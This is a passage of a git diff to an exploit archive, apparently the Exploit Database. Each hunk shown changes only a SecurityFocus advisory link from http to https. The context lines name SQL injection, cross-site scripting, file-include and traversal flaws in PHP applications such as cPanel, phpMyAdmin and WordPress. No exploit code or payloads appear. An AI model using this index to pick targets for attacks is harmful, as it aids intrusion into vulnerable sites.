sufficiently sanitize user-supplied input. These issues include an arbitrary file-upload vulnerability and a cross-site scripting vulnerability. diff --git a/exploits/php/webapps/28949.txt b/exploits/php/webapps/28949.txt index 1ddb096ad..2f2f1d59d 100644 --- a/exploits/php/webapps/28949.txt +++ b/exploits/php/webapps/28949.txt 
@@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/20988/info +source: https://www.securityfocus.com/bid/20988/info Bitweaver is prone to multiple input-validation vulnerabilities because the application fails to sufficiently sanitize user-supplied input. These issues include multiple HTML-injection issues and multiple SQL-injection issues. diff --git a/exploits/php/webapps/28950.txt b/exploits/php/webapps/28950.txt index b06732b67..98080980c 100644 --- a/exploits/php/webapps/28950.txt +++ b/exploits/php/webapps/28950.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/20989/info +source: https://www.securityfocus.com/bid/20989/info LandShop is prone to multiple input-validation vulnerabilities because it fails to sufficiently sanitize user-supplied input data. diff --git a/exploits/php/webapps/28951.txt b/exploits/php/webapps/28951.txt index 77f670688..28677bf23 100644 --- a/exploits/php/webapps/28951.txt +++ b/exploits/php/webapps/28951.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/20989/info +source: https://www.securityfocus.com/bid/20989/info LandShop is prone to multiple input-validation vulnerabilities because it fails to sufficiently sanitize user-supplied input data. diff --git a/exploits/php/webapps/28952.txt b/exploits/php/webapps/28952.txt index 70e4a1a8c..c65f8a3b2 100644 --- a/exploits/php/webapps/28952.txt +++ b/exploits/php/webapps/28952.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/20990/info +source: https://www.securityfocus.com/bid/20990/info Omnistar Article Manager is prone to multiple SQL-injection vulnerabilities because the application fails to properly sanitize user-supplied input before using it in an SQL query. diff --git a/exploits/php/webapps/28953.txt b/exploits/php/webapps/28953.txt index 239fe8a2f..5da847854 100644 --- a/exploits/php/webapps/28953.txt +++ b/exploits/php/webapps/28953.txt 
@@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/20996/info +source: https://www.securityfocus.com/bid/20996/info Bitweaver is prone to multiple SQL-injection and cross-site scripting vulnerabilities because it fails to sufficiently sanitize user-supplied data. diff --git a/exploits/php/webapps/28954.txt b/exploits/php/webapps/28954.txt index c6a80444d..e7564ae47 100644 --- a/exploits/php/webapps/28954.txt +++ b/exploits/php/webapps/28954.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/20996/info +source: https://www.securityfocus.com/bid/20996/info Bitweaver is prone to multiple SQL-injection and cross-site scripting vulnerabilities because it fails to sufficiently sanitize user-supplied data. diff --git a/exploits/php/webapps/28963.txt b/exploits/php/webapps/28963.txt index 5af48e97b..e89d15319 100644 --- a/exploits/php/webapps/28963.txt +++ b/exploits/php/webapps/28963.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/20996/info +source: https://www.securityfocus.com/bid/20996/info Bitweaver is prone to multiple SQL-injection and cross-site scripting vulnerabilities because it fails to sufficiently sanitize user-supplied data. diff --git a/exploits/php/webapps/28964.txt b/exploits/php/webapps/28964.txt index b9846c584..54eef8adb 100644 --- a/exploits/php/webapps/28964.txt +++ b/exploits/php/webapps/28964.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/20996/info +source: https://www.securityfocus.com/bid/20996/info Bitweaver is prone to multiple SQL-injection and cross-site scripting vulnerabilities because it fails to sufficiently sanitize user-supplied data. diff --git a/exploits/php/webapps/28965.txt b/exploits/php/webapps/28965.txt index 9b3ad367a..a076292d8 100644 --- a/exploits/php/webapps/28965.txt +++ b/exploits/php/webapps/28965.txt 
@@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/20996/info +source: https://www.securityfocus.com/bid/20996/info Bitweaver is prone to multiple SQL-injection and cross-site scripting vulnerabilities because it fails to sufficiently sanitize user-supplied data. diff --git a/exploits/php/webapps/28967.txt b/exploits/php/webapps/28967.txt index 108110d1f..77ca386c4 100644 --- a/exploits/php/webapps/28967.txt +++ b/exploits/php/webapps/28967.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/21003/info +source: https://www.securityfocus.com/bid/21003/info Exophpdesk is prone to a remote file-include vulnerability because it fails to sufficiently sanitize user-supplied data. diff --git a/exploits/php/webapps/28980.txt b/exploits/php/webapps/28980.txt index f3fa4a76d..772a9e7fa 100644 --- a/exploits/php/webapps/28980.txt +++ b/exploits/php/webapps/28980.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/21004/info +source: https://www.securityfocus.com/bid/21004/info WordPress is prone to a remote file-include vulnerability because it fails to sufficiently sanitize user-supplied data. diff --git a/exploits/php/webapps/28982.txt b/exploits/php/webapps/28982.txt index 2ff24ebc7..da29080c3 100644 --- a/exploits/php/webapps/28982.txt +++ b/exploits/php/webapps/28982.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/21027/info +source: https://www.securityfocus.com/bid/21027/info cPanel is prone to multiple cross-site scripting vulnerabilities because it fails to properly sanitize user-supplied input. diff --git a/exploits/php/webapps/28983.txt b/exploits/php/webapps/28983.txt index 7b010ce69..f3f22c63a 100644 --- a/exploits/php/webapps/28983.txt +++ b/exploits/php/webapps/28983.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/21027/info +source: https://www.securityfocus.com/bid/21027/info cPanel is prone to multiple cross-site scripting vulnerabilities because it fails to properly sanitize user-supplied input. 
diff --git a/exploits/php/webapps/28988.txt b/exploits/php/webapps/28988.txt index 77889e881..24277a851 100644 --- a/exploits/php/webapps/28988.txt +++ b/exploits/php/webapps/28988.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/21042/info +source: https://www.securityfocus.com/bid/21042/info Roundcube Webmail is prone to a cross-site scripting vulnerability because it fails to properly sanitize user-supplied input. diff --git a/exploits/php/webapps/28998.txt b/exploits/php/webapps/28998.txt index d904a02f8..73b58410d 100644 --- a/exploits/php/webapps/28998.txt +++ b/exploits/php/webapps/28998.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/21047/info +source: https://www.securityfocus.com/bid/21047/info Phpdebug is prone to a remote file-include vulnerability because it fails to sufficiently sanitize user-supplied data. diff --git a/exploits/php/webapps/28999.txt b/exploits/php/webapps/28999.txt index bd6146ff8..069c0c767 100644 --- a/exploits/php/webapps/28999.txt +++ b/exploits/php/webapps/28999.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/21049/info +source: https://www.securityfocus.com/bid/21049/info DirectAdmin is prone to multiple cross-site scripting vulnerabilities because it fails to properly sanitize user-supplied input. diff --git a/exploits/php/webapps/29000.txt b/exploits/php/webapps/29000.txt index 1121ba5e0..22505efc2 100644 --- a/exploits/php/webapps/29000.txt +++ b/exploits/php/webapps/29000.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/21049/info +source: https://www.securityfocus.com/bid/21049/info   DirectAdmin is prone to multiple cross-site scripting vulnerabilities because it fails to properly sanitize user-supplied input.   diff --git a/exploits/php/webapps/29001.txt b/exploits/php/webapps/29001.txt index e22aac401..a4ba35c47 100644 --- a/exploits/php/webapps/29001.txt +++ b/exploits/php/webapps/29001.txt 
@@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/21049/info +source: https://www.securityfocus.com/bid/21049/info DirectAdmin is prone to multiple cross-site scripting vulnerabilities because it fails to properly sanitize user-supplied input. diff --git a/exploits/php/webapps/29002.txt b/exploits/php/webapps/29002.txt index fb3cbad39..b4d0c0ec3 100644 --- a/exploits/php/webapps/29002.txt +++ b/exploits/php/webapps/29002.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/21049/info +source: https://www.securityfocus.com/bid/21049/info DirectAdmin is prone to multiple cross-site scripting vulnerabilities because it fails to properly sanitize user-supplied input. diff --git a/exploits/php/webapps/29003.txt b/exploits/php/webapps/29003.txt index bfd212602..062e156fa 100644 --- a/exploits/php/webapps/29003.txt +++ b/exploits/php/webapps/29003.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/21049/info +source: https://www.securityfocus.com/bid/21049/info DirectAdmin is prone to multiple cross-site scripting vulnerabilities because it fails to properly sanitize user-supplied input. diff --git a/exploits/php/webapps/29004.txt b/exploits/php/webapps/29004.txt index 2f302ee68..69f588756 100644 --- a/exploits/php/webapps/29004.txt +++ b/exploits/php/webapps/29004.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/21049/info +source: https://www.securityfocus.com/bid/21049/info DirectAdmin is prone to multiple cross-site scripting vulnerabilities because it fails to properly sanitize user-supplied input. diff --git a/exploits/php/webapps/29005.txt b/exploits/php/webapps/29005.txt index c69b163cd..279157c7a 100644 --- a/exploits/php/webapps/29005.txt +++ b/exploits/php/webapps/29005.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/21049/info +source: https://www.securityfocus.com/bid/21049/info DirectAdmin is prone to multiple cross-site scripting vulnerabilities because it fails to properly sanitize user-supplied input. 
diff --git a/exploits/php/webapps/29006.txt b/exploits/php/webapps/29006.txt index b45fd6305..0c117523c 100644 --- a/exploits/php/webapps/29006.txt +++ b/exploits/php/webapps/29006.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/21049/info +source: https://www.securityfocus.com/bid/21049/info DirectAdmin is prone to multiple cross-site scripting vulnerabilities because it fails to properly sanitize user-supplied input. diff --git a/exploits/php/webapps/29017.txt b/exploits/php/webapps/29017.txt index 7fc0f4af0..6505f8323 100644 --- a/exploits/php/webapps/29017.txt +++ b/exploits/php/webapps/29017.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/21067/info +source: https://www.securityfocus.com/bid/21067/info Plesk is prone to multiple HTML-injection vulnerabilities because it fails to sufficiently sanitize user-supplied input data. diff --git a/exploits/php/webapps/29018.txt b/exploits/php/webapps/29018.txt index c0e46a84e..170fe2254 100644 --- a/exploits/php/webapps/29018.txt +++ b/exploits/php/webapps/29018.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/21067/info +source: https://www.securityfocus.com/bid/21067/info Plesk is prone to multiple HTML-injection vulnerabilities because it fails to sufficiently sanitize user-supplied input data. diff --git a/exploits/php/webapps/29026.txt b/exploits/php/webapps/29026.txt index 72491cf59..8f4aadb5f 100644 --- a/exploits/php/webapps/29026.txt +++ b/exploits/php/webapps/29026.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/21072/info +source: https://www.securityfocus.com/bid/21072/info Megamail is prone to multiple SQL-injection vulnerabilities because it fails to sufficiently sanitize user-supplied data before using it in an SQL query. diff --git a/exploits/php/webapps/29027.txt b/exploits/php/webapps/29027.txt index ff8eeb364..bef081e4e 100644 --- a/exploits/php/webapps/29027.txt +++ b/exploits/php/webapps/29027.txt 
@@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/21072/info +source: https://www.securityfocus.com/bid/21072/info Megamail is prone to multiple SQL-injection vulnerabilities because it fails to sufficiently sanitize user-supplied data before using it in an SQL query. diff --git a/exploits/php/webapps/29047.txt b/exploits/php/webapps/29047.txt index 1caae0f06..9c610dd48 100644 --- a/exploits/php/webapps/29047.txt +++ b/exploits/php/webapps/29047.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/21112/info +source: https://www.securityfocus.com/bid/21112/info Hot Links is prone to an information-disclosure vulnerability because it fails to authenticate the user during specific download requests. diff --git a/exploits/php/webapps/29049.txt b/exploits/php/webapps/29049.txt index b0341b5ec..dcb93ea8e 100644 --- a/exploits/php/webapps/29049.txt +++ b/exploits/php/webapps/29049.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/21125/info +source: https://www.securityfocus.com/bid/21125/info BlogTorrent Preview is prone to a cross-site scripting vulnerability because the application fails to properly sanitize user-supplied input. diff --git a/exploits/php/webapps/29050.txt b/exploits/php/webapps/29050.txt index e698c4357..994bc9ee3 100644 --- a/exploits/php/webapps/29050.txt +++ b/exploits/php/webapps/29050.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/21128/info +source: https://www.securityfocus.com/bid/21128/info Odysseus Blog is prone to a cross-site scripting vulnerability because it fails to sufficiently sanitize user-supplied input. diff --git a/exploits/php/webapps/29051.txt b/exploits/php/webapps/29051.txt index 60e39e710..444d501ba 100644 --- a/exploits/php/webapps/29051.txt +++ b/exploits/php/webapps/29051.txt 
@@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/21129/info +source: https://www.securityfocus.com/bid/21129/info Sphpblog is prone to multiple cross-site scripting vulnerabilities because it fails to properly sanitize user-supplied input. diff --git a/exploits/php/webapps/29058.txt b/exploits/php/webapps/29058.txt index 7eeca1560..492f24d67 100644 --- a/exploits/php/webapps/29058.txt +++ b/exploits/php/webapps/29058.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/21137/info +source: https://www.securityfocus.com/bid/21137/info phpMyAdmin is prone to multiple input-validation vulnerabilities, including an HTML-injection vulnerability, cross-site scripting vulnerabilities, and information-disclosure vulnerabilities. diff --git a/exploits/php/webapps/29059.txt b/exploits/php/webapps/29059.txt index 2f960e6e2..fe2db5622 100644 --- a/exploits/php/webapps/29059.txt +++ b/exploits/php/webapps/29059.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/21137/info +source: https://www.securityfocus.com/bid/21137/info phpMyAdmin is prone to multiple input-validation vulnerabilities, including an HTML-injection vulnerability, cross-site scripting vulnerabilities, and information-disclosure vulnerabilities. diff --git a/exploits/php/webapps/29060.txt b/exploits/php/webapps/29060.txt index 5d94af9d2..772b167b1 100644 --- a/exploits/php/webapps/29060.txt +++ b/exploits/php/webapps/29060.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/21137/info +source: https://www.securityfocus.com/bid/21137/info phpMyAdmin is prone to multiple input-validation vulnerabilities, including an HTML-injection vulnerability, cross-site scripting vulnerabilities, and information-disclosure vulnerabilities. diff --git a/exploits/php/webapps/29061.txt b/exploits/php/webapps/29061.txt index 647fadaa2..0b32af9ff 100644 --- a/exploits/php/webapps/29061.txt +++ b/exploits/php/webapps/29061.txt 
@@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/21137/info +source: https://www.securityfocus.com/bid/21137/info phpMyAdmin is prone to multiple input-validation vulnerabilities, including an HTML-injection vulnerability, cross-site scripting vulnerabilities, and information-disclosure vulnerabilities. diff --git a/exploits/php/webapps/29062.txt b/exploits/php/webapps/29062.txt index efeda2bc4..68e408cfa 100644 --- a/exploits/php/webapps/29062.txt +++ b/exploits/php/webapps/29062.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/21137/info +source: https://www.securityfocus.com/bid/21137/info phpMyAdmin is prone to multiple input-validation vulnerabilities, including an HTML-injection vulnerability, cross-site scripting vulnerabilities, and information-disclosure vulnerabilities. diff --git a/exploits/php/webapps/29071.txt b/exploits/php/webapps/29071.txt index 6d161b761..45ac4b48b 100644 --- a/exploits/php/webapps/29071.txt +++ b/exploits/php/webapps/29071.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/21142/info +source: https://www.securityfocus.com/bid/21142/info Cpanel is prone to a cross-site scripting vulnerability because the application fails to properly sanitize user-supplied input. diff --git a/exploits/php/webapps/29072.txt b/exploits/php/webapps/29072.txt index 6f5740df7..ea46c08cb 100644 --- a/exploits/php/webapps/29072.txt +++ b/exploits/php/webapps/29072.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/21150/info +source: https://www.securityfocus.com/bid/21150/info PHP Upload Tool is prone to an arbitrary file-upload vulnerability and a directory-traversal vulnerability. These issues occur because the application fails to sanitize user-supplied data. diff --git a/exploits/php/webapps/29079.txt b/exploits/php/webapps/29079.txt index 77bcbcf4c..ced0ab3a7 100644 --- a/exploits/php/webapps/29079.txt +++ b/exploits/php/webapps/29079.txt 
@@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/21157/info +source: https://www.securityfocus.com/bid/21157/info vBulletin is prone to multiple cross-site scripting vulnerabilities because it fails to sufficiently sanitize user-supplied input data. diff --git a/exploits/php/webapps/29095.txt b/exploits/php/webapps/29095.txt index 95ee2edf4..67681afcf 100644 --- a/exploits/php/webapps/29095.txt +++ b/exploits/php/webapps/29095.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/21173/info +source: https://www.securityfocus.com/bid/21173/info BLOG:CMS is prone to a cross-site scripting vulnerability because the application fails to properly sanitize user-supplied input. diff --git a/exploits/php/webapps/29097.txt b/exploits/php/webapps/29097.txt index da2152f43..2d342bda0 100644 --- a/exploits/php/webapps/29097.txt +++ b/exploits/php/webapps/29097.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/21182/info +source: https://www.securityfocus.com/bid/21182/info Dolphin is prone to a remote file-include vulnerability because it fails to properly sanitize user-supplied input. diff --git a/exploits/php/webapps/29098.txt b/exploits/php/webapps/29098.txt index 02004f3eb..d61340e19 100644 --- a/exploits/php/webapps/29098.txt +++ b/exploits/php/webapps/29098.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/21184/info +source: https://www.securityfocus.com/bid/21184/info BirdBlog is prone to multiple cross-site scripting vulnerabilities because the application fails to properly sanitize user-supplied input. diff --git a/exploits/php/webapps/29099.txt b/exploits/php/webapps/29099.txt index 784d264cc..b5ceae64f 100644 --- a/exploits/php/webapps/29099.txt +++ b/exploits/php/webapps/29099.txt 
@@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/21184/info +source: https://www.securityfocus.com/bid/21184/info BirdBlog is prone to multiple cross-site scripting vulnerabilities because the application fails to properly sanitize user-supplied input. diff --git a/exploits/php/webapps/29100.txt b/exploits/php/webapps/29100.txt index f505ede35..71b8a6b2d 100644 --- a/exploits/php/webapps/29100.txt +++ b/exploits/php/webapps/29100.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/21184/info +source: https://www.securityfocus.com/bid/21184/info BirdBlog is prone to multiple cross-site scripting vulnerabilities because the application fails to properly sanitize user-supplied input. diff --git a/exploits/php/webapps/29101.txt b/exploits/php/webapps/29101.txt index 420fbfe66..965a8a1f6 100644 --- a/exploits/php/webapps/29101.txt +++ b/exploits/php/webapps/29101.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/21184/info +source: https://www.securityfocus.com/bid/21184/info BirdBlog is prone to multiple cross-site scripting vulnerabilities because the application fails to properly sanitize user-supplied input. diff --git a/exploits/php/webapps/29128.txt b/exploits/php/webapps/29128.txt index ce4b11bee..3188b403d 100644 --- a/exploits/php/webapps/29128.txt +++ b/exploits/php/webapps/29128.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/21196/info +source: https://www.securityfocus.com/bid/21196/info Vikingboard is prone to multiple HTML-injection vulnerabilities and a directory-traversal vulnerability because it fails to sufficiently sanitize user-supplied input data. diff --git a/exploits/php/webapps/29145.txt b/exploits/php/webapps/29145.txt index dec3799cb..248c6c09a 100644 --- a/exploits/php/webapps/29145.txt +++ b/exploits/php/webapps/29145.txt 
@@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/21213/info +source: https://www.securityfocus.com/bid/21213/info Wabbit PHP Gallery is prone to a directory-traversal vulnerability because the application fails to properly sanitize user-supplied input. diff --git a/exploits/php/webapps/29157.txt b/exploits/php/webapps/29157.txt index d7b804c97..2063b1424 100644 --- a/exploits/php/webapps/29157.txt +++ b/exploits/php/webapps/29157.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/21232/info +source: https://www.securityfocus.com/bid/21232/info Seditio is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data before using it in an SQL query. diff --git a/exploits/php/webapps/29158.txt b/exploits/php/webapps/29158.txt index d9931cc3a..cb8587501 100644 --- a/exploits/php/webapps/29158.txt +++ b/exploits/php/webapps/29158.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/21233/info +source: https://www.securityfocus.com/bid/21233/info CuteNews is prone to multiple input-validation vulnerabilities, including an HTML-injection vulnerability, cross-site scripting vulnerabilities, and information-disclosure vulnerabilities. diff --git a/exploits/php/webapps/29159.txt b/exploits/php/webapps/29159.txt index b7f84fcc0..ba5f2ed37 100644 --- a/exploits/php/webapps/29159.txt +++ b/exploits/php/webapps/29159.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/21233/info +source: https://www.securityfocus.com/bid/21233/info CuteNews is prone to multiple input-validation vulnerabilities, including an HTML-injection vulnerability, cross-site scripting vulnerabilities, and information-disclosure vulnerabilities. diff --git a/exploits/php/webapps/29162.txt b/exploits/php/webapps/29162.txt index 889a544a1..ae8b01b3a 100644 --- a/exploits/php/webapps/29162.txt +++ b/exploits/php/webapps/29162.txt 
@@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/21238/info +source: https://www.securityfocus.com/bid/21238/info My Little Weblog is prone to a cross-site scripting vulnerability because it fails to sufficiently sanitize user-supplied input to the 'action' parameter of the 'weblog.php' script. diff --git a/exploits/php/webapps/29165.txt b/exploits/php/webapps/29165.txt index 339e0cb73..89c8ec64a 100644 --- a/exploits/php/webapps/29165.txt +++ b/exploits/php/webapps/29165.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/21250/info +source: https://www.securityfocus.com/bid/21250/info InverseFlow Help Desk is prone to multiple cross-site scripting vulnerabilities. diff --git a/exploits/php/webapps/29166.txt b/exploits/php/webapps/29166.txt index 63e6d2e37..1d42f1395 100644 --- a/exploits/php/webapps/29166.txt +++ b/exploits/php/webapps/29166.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/21250/info +source: https://www.securityfocus.com/bid/21250/info InverseFlow Help Desk is prone to multiple cross-site scripting vulnerabilities. diff --git a/exploits/php/webapps/29173.txt b/exploits/php/webapps/29173.txt index b8823586a..21a42c346 100644 --- a/exploits/php/webapps/29173.txt +++ b/exploits/php/webapps/29173.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/21263/info +source: https://www.securityfocus.com/bid/21263/info Active PHP Bookmarks application is prone to multiple remote file-include vulnerabilities because it fails to sufficiently sanitize user-supplied data. diff --git a/exploits/php/webapps/29175.txt b/exploits/php/webapps/29175.txt index f7a47ef6c..d16be118d 100644 --- a/exploits/php/webapps/29175.txt +++ b/exploits/php/webapps/29175.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/21278/info +source: https://www.securityfocus.com/bid/21278/info Simple PHP Gallery is prone to a cross-site scripting vulnerability because the application fails to properly sanitize user-supplied input. 
diff --git a/exploits/php/webapps/29177.txt b/exploits/php/webapps/29177.txt index a0b88efff..66d1298a7 100644 --- a/exploits/php/webapps/29177.txt +++ b/exploits/php/webapps/29177.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/21281/info +source: https://www.securityfocus.com/bid/21281/info The mmgallery script is prone to a cross-site scripting vulnerability because it fails to properly sanitize user-supplied input. diff --git a/exploits/php/webapps/29181.txt b/exploits/php/webapps/29181.txt index 5e209a7ba..3a5722d95 100644 --- a/exploits/php/webapps/29181.txt +++ b/exploits/php/webapps/29181.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/21287/info +source: https://www.securityfocus.com/bid/21287/info cPanel is prone to multiple cross-site scripting vulnerabilities because it fails to properly sanitize user-supplied input. diff --git a/exploits/php/webapps/29182.txt b/exploits/php/webapps/29182.txt index abec2f200..3ca6fcc05 100644 --- a/exploits/php/webapps/29182.txt +++ b/exploits/php/webapps/29182.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/21288/info +source: https://www.securityfocus.com/bid/21288/info WebHost Manager is prone to multiple cross-site scripting vulnerabilities because it fails to properly sanitize user-supplied input. diff --git a/exploits/php/webapps/29183.txt b/exploits/php/webapps/29183.txt index 635868f0c..c155596bc 100644 --- a/exploits/php/webapps/29183.txt +++ b/exploits/php/webapps/29183.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/21288/info +source: https://www.securityfocus.com/bid/21288/info WebHost Manager is prone to multiple cross-site scripting vulnerabilities because it fails to properly sanitize user-supplied input. diff --git a/exploits/php/webapps/29184.txt b/exploits/php/webapps/29184.txt index f14ade73b..7cae5af0d 100644 --- a/exploits/php/webapps/29184.txt +++ b/exploits/php/webapps/29184.txt 
@@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/21288/info +source: https://www.securityfocus.com/bid/21288/info WebHost Manager is prone to multiple cross-site scripting vulnerabilities because it fails to properly sanitize user-supplied input. diff --git a/exploits/php/webapps/29185.txt b/exploits/php/webapps/29185.txt index 8e83e8182..c9474a3f4 100644 --- a/exploits/php/webapps/29185.txt +++ b/exploits/php/webapps/29185.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/21288/info +source: https://www.securityfocus.com/bid/21288/info WebHost Manager is prone to multiple cross-site scripting vulnerabilities because it fails to properly sanitize user-supplied input. diff --git a/exploits/php/webapps/29186.txt b/exploits/php/webapps/29186.txt index 895031a0b..2a6987604 100644 --- a/exploits/php/webapps/29186.txt +++ b/exploits/php/webapps/29186.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/21288/info +source: https://www.securityfocus.com/bid/21288/info WebHost Manager is prone to multiple cross-site scripting vulnerabilities because it fails to properly sanitize user-supplied input. diff --git a/exploits/php/webapps/29187.txt b/exploits/php/webapps/29187.txt index cfc69c03a..a39f7081e 100644 --- a/exploits/php/webapps/29187.txt +++ b/exploits/php/webapps/29187.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/21288/info +source: https://www.securityfocus.com/bid/21288/info WebHost Manager is prone to multiple cross-site scripting vulnerabilities because it fails to properly sanitize user-supplied input. diff --git a/exploits/php/webapps/29188.txt b/exploits/php/webapps/29188.txt index 88141ea58..d83908d20 100644 --- a/exploits/php/webapps/29188.txt +++ b/exploits/php/webapps/29188.txt 
@@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/21288/info +source: https://www.securityfocus.com/bid/21288/info WebHost Manager is prone to multiple cross-site scripting vulnerabilities because it fails to properly sanitize user-supplied input. diff --git a/exploits/php/webapps/29198.txt b/exploits/php/webapps/29198.txt index 48dbfcc67..69d98dc46 100644 --- a/exploits/php/webapps/29198.txt +++ b/exploits/php/webapps/29198.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/21334/info +source: https://www.securityfocus.com/bid/21334/info The b2evolution application is prone to multiple cross-site scripting vulnerabilities because it fails to properly sanitize user-supplied input. diff --git a/exploits/php/webapps/29199.txt b/exploits/php/webapps/29199.txt index cf059764a..a94fae9b5 100644 --- a/exploits/php/webapps/29199.txt +++ b/exploits/php/webapps/29199.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/21334/info +source: https://www.securityfocus.com/bid/21334/info The b2evolution application is prone to multiple cross-site scripting vulnerabilities because it fails to properly sanitize user-supplied input. diff --git a/exploits/php/webapps/29200.txt b/exploits/php/webapps/29200.txt index ae493c9e0..9172b4d91 100644 --- a/exploits/php/webapps/29200.txt +++ b/exploits/php/webapps/29200.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/21334/info +source: https://www.securityfocus.com/bid/21334/info The b2evolution application is prone to multiple cross-site scripting vulnerabilities because it fails to properly sanitize user-supplied input. diff --git a/exploits/php/webapps/29202.txt b/exploits/php/webapps/29202.txt index d04c14eb4..6aa1fa540 100644 --- a/exploits/php/webapps/29202.txt +++ b/exploits/php/webapps/29202.txt 
@@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/21366/info +source: https://www.securityfocus.com/bid/21366/info Seditio and Land Down Under are prone to an SQL-injection vulnerability because the applications fail to properly sanitize user-supplied input before using it in an SQL query. diff --git a/exploits/php/webapps/29203.php b/exploits/php/webapps/29203.php index 59523bcb9..146eaba4e 100644 --- a/exploits/php/webapps/29203.php +++ b/exploits/php/webapps/29203.php @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/21370/info +source: https://www.securityfocus.com/bid/21370/info Woltlab Burning Board is prone to a cross-site scripting vulnerability because the application fails to properly sanitize user-supplied input. diff --git a/exploits/php/webapps/29205.txt b/exploits/php/webapps/29205.txt index 4a79a57f8..16c8994cb 100644 --- a/exploits/php/webapps/29205.txt +++ b/exploits/php/webapps/29205.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/21388/info +source: https://www.securityfocus.com/bid/21388/info Invision Gallery is prone to an SQL-injection vulnerability because the application fails to properly sanitize user-supplied input before using it in an SQL query. diff --git a/exploits/php/webapps/29207.txt b/exploits/php/webapps/29207.txt index 91586e519..7480eab02 100644 --- a/exploits/php/webapps/29207.txt +++ b/exploits/php/webapps/29207.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/21391/info +source: https://www.securityfocus.com/bid/21391/info deV!Lz Clanportal is prone to an SQL-injection vulnerability because the application fails to properly sanitize user-supplied input before using it in an SQL query. diff --git a/exploits/php/webapps/29215.txt b/exploits/php/webapps/29215.txt index d4d1ec1ee..a09c2dc1b 100644 --- a/exploits/php/webapps/29215.txt +++ b/exploits/php/webapps/29215.txt 
